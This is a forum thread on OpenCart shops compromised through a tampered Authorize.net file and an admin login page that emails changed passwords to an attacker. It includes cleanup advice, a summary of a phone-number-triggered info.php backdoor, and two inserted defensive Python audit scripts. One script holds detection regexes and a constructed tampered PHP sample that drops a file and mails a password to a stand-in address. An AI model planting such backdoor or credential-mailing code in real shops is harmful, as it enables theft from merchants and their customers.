-Jeff

I recall such incidents; a few months ago, there were some topics on this.
Unfortunately, you probably have only one way to go, by removing the source completely,
in FULL, by deleting the Shop Sub, on the Server, and afterwards re-install a guaranteed still 'virgin'
Backup Copy. And make sure, you have NOTHING in your DB, eventually repeating the whole thing again.
It's a Virus ok, so, just act accordingly.
Good Luck !
Ernie
PS. For others: Such 'Content' would likely be placed also with/in highly popular Paid Themes, such as Journal, and others, as well, and is usually coded in unreadable Base64 Format. And possibly downloaded, by plain accident, from some shady Freeware-Servers. For them, it's just a free way to sell Themes! Buy Now, we get paid LATER !

My Github OC Site: https://github.com/IP-CAM
5'600 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
/catalog/controller/payment/
/catalog/model/payment/
The standard Authorize.net files are authorizenet_aim.php and authorizenet_sim.php, so it should be named something different. If those are the only ones, you should open them up and see if there is hard-coded information in there (to send it to the hacker's account).
investigated and cleaned out a friend's site some time ago,
Order refrigeration door gaskets easily online, made to measure.
All parts not requiring STEK-certified installation, such as hinges, locks, frame heating and lighting, for all types of coolers and freezers.
https://koelcel-onderdelen.com
1. VERY IMPORTANT: The login page has probably been hacked!
The login page code has been edited so that if you try and change the passwords, when you login again the Hacker receives the new password directly to his email account.
2. You CANNOT enable/disable Authorize.net via OpenCart admin.
The hack uses a file that by-passes this function completely so it has nothing to do with the payment settings you have set up. You must delete/replace hacked files via FTP to restore normal function.
3. You will have to fix this problem via FTP by locating and overwriting the changed files then changing your password (ideally through PhpMyAdmin). There is no point changing your passwords until AFTER you fix the login page hack.
4. You do not need to replace ALL your files to fix this... that is a last resort!
We do not believe this hack requires that the hacker is able to log in... but we cannot be sure. In v1.5.6 we found all sorts of junk had been uploaded to the server... but I do not think this is the 'download vulnerability' people spoke about before, as we are in V2 and we had already removed the list of file types that could be uploaded.
Here is how we fixed it:
Firstly, we had to find all the files that had been changed by the hacker... you will see that these have a 'Last modified' date that will be very recent compared to the other files (most of which will be the same date from the time of installation).
We found on both occasions that these were the files that had been changed:
/admin/controller/extension/payment.php
/admin/controller/common/login.php
/catalog/controller/payment/authorizenet_aim.php
However, we would advise you to check through the folders for any other new or recently modified files if the following instructions do not fix your problem.
We had a copy of the website elsewhere so we could see that not only were the last modified dates 'today' but the file sizes were notably different - so the code was not the same.
We suggest you take a full backup of your site via FTP - name it clearly as a 'hacked' version not to be re-uploaded.
Once this is done, unzip a new local copy of your version of OpenCart... locate the files listed above and copy them to a folder & subfolders (we called ours 'Authorize Hack Clean Files'). You will then be able to quickly upload if it ever happens again.
Then delete the files on the server and replace with the 'clean' files - this should be enough to fix the problem.
Please note:
You cannot simply rename the authorizenet_aim.php file - even if you change the name and remove the file extension - we found it kept loading the Authorize.net option in the checkout. It must be completely removed.
Once those changes are done, you can set up a new password for your accounts. We used a secure password generator to try and make it more certain it was not a hack via password login... we don't think it is... but we do not know how this hack is done.
Lastly we deleted all the allowed file types and MIME types in the Settings > Uploads... we kept a copy of these lists in case we need to put any/all of them back again.
I hope these details help a few people out - I would really appreciate anyone listing any 'official' name for this hack, as it seems to be happening often enough and in the same way; I imagine it has been identified by others too?
Related posts:
viewtopic.php?f=179&t=147282
http://forum.opencart.com/viewtopic.php?f=20&t=144753
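The clean-up above rests on two manual checks: comparing 'Last modified' dates against the install date, and comparing the live files with a clean copy of the same OpenCart version. Both can be scripted. The following is an added example, not code from the post or from OpenCart: it assumes a clean unpacked copy of your version in one directory and an FTP download of the live site in another, hashes every file instead of trusting sizes, and also lists recently modified and world-writable files. The directory layout, file contents and 'install date' in demo() are constructed for the run.

```python
#!/usr/bin/env python3
"""Baseline comparison of a live OpenCart tree against a known-clean copy.

Added example, not code from the forum thread. Assumes a clean unpacked copy
of your OpenCart version next to an FTP download of the live site; the tree
built in demo() is constructed.
"""
import hashlib
import os
import stat
import tempfile
import time
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large uploads/images need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict:
    """Map each regular file (relative POSIX path) under root to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in root.rglob("*")
        if p.is_file()
    }


def compare_trees(clean_root, live_root, recent_days=7, now=None) -> dict:
    """Report files that differ from the clean copy, plus the two hints the post
    relies on: a recent 'last modified' date and loose permissions."""
    clean_root, live_root = Path(clean_root), Path(live_root)
    clean, live = snapshot(clean_root), snapshot(live_root)
    now = time.time() if now is None else now
    report = {"modified": [], "new": [], "missing": [], "recent": [], "world_writable": []}
    for rel, digest in live.items():
        if rel not in clean:
            report["new"].append(rel)             # "any other new file"
        elif clean[rel] != digest:
            report["modified"].append(rel)        # content differs, whatever the size
        st = (live_root / rel).stat()
        if now - st.st_mtime < recent_days * 86400:
            report["recent"].append(rel)          # mtime newer than the install date
        if st.st_mode & stat.S_IWOTH:
            report["world_writable"].append(rel)  # chmod 666/777 leftovers
    report["missing"] = list(set(clean) - set(live))
    for key in report:
        report[key].sort()
    return report


def demo() -> dict:
    """Build a constructed clean/live pair using the paths named in the post."""
    base = Path(tempfile.mkdtemp(prefix="oc-audit-"))
    clean, live = base / "clean", base / "live"
    original = {
        "admin/controller/extension/payment.php": "<?php\n// payment extension list\n",
        "admin/controller/common/login.php": "<?php\n// admin login controller\n",
        "catalog/controller/payment/authorizenet_aim.php": "<?php\n// Authorize.net AIM\n",
        "catalog/controller/payment/pp_standard.php": "<?php\n// untouched module\n",
    }
    installed = time.time() - 400 * 86400  # pretend the install is over a year old
    for root in (clean, live):
        for rel, body in original.items():
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
            os.chmod(path, 0o644)
            os.utime(path, (installed, installed))
    # Constructed tampering: one controller edited today, one stray file dropped,
    # one module left world-writable. Only markers, no payload.
    (live / "admin/controller/common/login.php").write_text(
        "<?php\n// admin login controller\n// tampered (constructed)\n")
    (live / "catalog/controller/payment/info.php").write_text(
        "<?php\n// stray file (constructed)\n")
    os.chmod(live / "catalog/controller/payment/pp_standard.php", 0o666)
    return compare_trees(clean, live)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key:15s} {paths}")
```

Run it against real directories with compare_trees("/path/to/clean-opencart", "/path/to/ftp-download"); anything under "modified" or "new" is what the post tells you to replace or remove, and "world_writable" is worth fixing at the same time.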
Quote: "You CANNOT enable/disable Authorize.net via OpenCart admin."
But one could fully remove all those payment (and/or shipping) related files one does not use
from all the template/ model/ controller/ language/ sections, in the Admin and Root Section.
Then, at least, one can be sure that, if something like this shows up, it has nothing to do
with the OC Shop Source and/or Settings themselves.
Just to mention this!
Ernie
BTW. There is another interesting Topic on this here:
http://forum.opencart.com/viewtopic.php?f=179&t=147282
If you're using shared hosting and trying to save money by having one account for multiple domains, I'd suggest not doing that. More than likely the hacker got in through one of your other sites and once they are in, they have access to everything on your hosting account.
Opencart Hosting Plans, Domain Registration, Microsoft and Google Email and More
Visit our website for great deals and most importantly, fast and friendly support - www.evolvewebhosting.com
We too are seeing lots of payment gateway hacks in Opencart in which the Opencart Admin password and other info are compromised. In some cases, even the default payment method is changed and a new payment channel is added like a phishing form that collects credit card details and other confidential info of customers.
Recently, our engineers also discovered that hackers have planted a backdoor in Opencart. Generally, in e-commerce stores, the site allows free account creation. The attackers modified the code in such a way that by entering a particular phone no. a file 'info.php' gets created, which gives the hacker an option to upload a file.
Researchers at Astra have uncovered the step by step process.
Step 1: The attackers used free signups to create multiple new users. Multiple accounts meant minimum detection possibility.
Step 2: Then, the attackers entered a particular Phone No. in the input field. The attackers have obfuscated the real Phone No. by encrypting it in md5 format. The encrypted string is 66b6d63b9634e1159e53e29858de2c2d. This No. acts as a master key to upload backdoors.
Step 3: As soon as the phone no. is added, a file with the name info.php is created. So the final URL looks something like this: example.com/info.php.
Step 4: When the file info.php is accessed by the attackers, it gives them the ability to upload files.
Step 5: This upload option allows attackers to upload infected PHP files. These files open a reverse TCP, ICMP etc. connection to the attackers. When the files are uploaded in the root directory the results could be more disastrous!
We recommend you to have a regular code audit of your website to protect it from such attacks.
Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk
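Two things in this thread can be checked mechanically: Ernie's note that injected code usually arrives as unreadable Base64, and the Astra post's trigger (a stored telephone value whose md5 equals the quoted string, a hard-coded md5 comparison in a controller, a file write, credentials mailed out). The following is an added example, not Astra's or OpenCart's code: a small indicator scanner for PHP source plus a check of customer telephone values against the quoted hash. The regex rules, rule names and both sample controllers are constructed; the only page-derived value is the md5 string. Hits are leads for manual review, not proof of compromise, since legitimate code also writes files.

```python
#!/usr/bin/env python3
"""Indicator scan for tampered OpenCart PHP files and the phone-number trigger.

Added example, not Astra's or OpenCart's code. The md5 string is the one quoted
in the thread; rules, names and samples are constructed.
"""
import hashlib
import re

# md5 string quoted in the Astra post as the 'master key' phone number.
TRIGGER_MD5 = "66b6d63b9634e1159e53e29858de2c2d"

# (rule name, compiled regex). Hits are review leads, not verdicts.
INDICATORS = [
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("hard-coded-md5-gate",
     re.compile(r"\bmd5\s*\([^)]*\)\s*===?\s*['\"][0-9a-f]{32}['\"]", re.I)),
    ("long-base64-literal",
     re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
    ("credentials-mailed-out",
     re.compile(r"\bmail\s*\([^;]*\$(?:password|pass|pwd)\b", re.I)),
    ("file-write-call",
     re.compile(r"\b(?:file_put_contents|move_uploaded_file|fwrite)\s*\(", re.I)),
]


def scan_php_source(source: str) -> list:
    """Return (line_number, rule_name) pairs for every indicator hit, in file order."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def phone_matches_trigger(phone: str) -> bool:
    """True if a stored telephone value hashes to the trigger, as typed or digits-only."""
    candidates = {phone.strip(), re.sub(r"\D", "", phone)}
    return any(hashlib.md5(c.encode()).hexdigest() == TRIGGER_MD5 for c in candidates)


def find_trigger_accounts(customers) -> list:
    """Filter customer rows (dicts with customer_id and telephone) for the trigger."""
    return [row["customer_id"] for row in customers if phone_matches_trigger(row["telephone"])]


# Constructed samples: a clean login-controller fragment, and a tampered one
# that mirrors the behaviour the thread describes (md5 gate, file drop,
# obfuscated blob, password mailed out). The payload itself is omitted.
CLEAN_SAMPLE = """<?php
$this->load->model('user/user');
if ($this->user->login($this->request->post['username'], $this->request->post['password'])) {
    $this->response->redirect($this->url->link('common/dashboard', '', true));
}
"""

TAMPERED_SAMPLE = """<?php
// tampered controller (constructed example)
if (md5($this->request->post['telephone']) == '66b6d63b9634e1159e53e29858de2c2d') {
    file_put_contents(DIR_APPLICATION . '../info.php', $payload);
}
eval(base64_decode('""" + "QUJD" * 40 + """'));
mail('mailbox@example.invalid', 'login', $password);
"""

if __name__ == "__main__":
    print("clean   :", scan_php_source(CLEAN_SAMPLE))
    print("tampered:", scan_php_source(TAMPERED_SAMPLE))
    print("trigger :", find_trigger_accounts([{"customer_id": 1, "telephone": "+1 555 0100"}]))
```

In practice, feed scan_php_source() the contents of every .php file under admin/ and catalog/ (themes included) and feed find_trigger_accounts() a dump of the customer table; a hit on the md5 gate or on the trigger account is the cue to pull the file and the account for a closer look.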
They post only to advertise an unnecessary service!
If they can show me one hacked shop with the current version (with no modifications!), I will be the first who books them.
Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.
Quote: "Have you ever seen how the attackers get access in the first place?"
Well, as long as even some Super-Smarties around here propagated CHMOD 775/777
to be valid Numbers for OC files, it's no wonder that some get hurt ...
Ernie
PS. A very old one ...
http://www.opencart.org/opencart/cgi-bin/
https://www.google.com/search?q=Opencart+Vulnerability